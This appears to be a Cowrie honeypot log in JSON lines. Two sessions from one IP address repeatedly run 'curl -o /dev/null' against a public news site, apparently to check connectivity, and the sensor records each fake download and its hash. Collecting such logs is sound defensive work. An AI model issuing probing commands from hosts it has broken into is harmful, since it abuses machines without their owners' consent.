{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.422459Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.433955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.435071Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.437973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.439013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.441878Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.447458Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.454088Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.461963Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.470173Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.472708Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.473835Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.477812Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.480010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.480961Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.490400Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.498427Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.511033Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.511963Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.520184Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.522611Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.523455Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.530846Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.546113Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.550011Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.550778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.559478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.560261Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.583290Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.586372Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.607262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.608301Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.612040Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.613139Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.646625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.647357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.651285Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.651885Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.689038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.689871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.692801Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.693338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.720538Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.727089Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.727901Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.731450Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.735395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.737363Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.737954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.744330Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.749490Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.759820Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.762255Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.766655Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.767329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.779266Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.781427Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.782960Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.785696Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.795588Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.797494Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.799551Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.801116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.801579Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.805253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.809079Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.811025Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.811616Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.823929Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.843388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.844520Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.848588Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.850056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.883724Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.884805Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.888582Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.889694Z","src_ip":"212.227.125.160","session":"7541ed730449"}
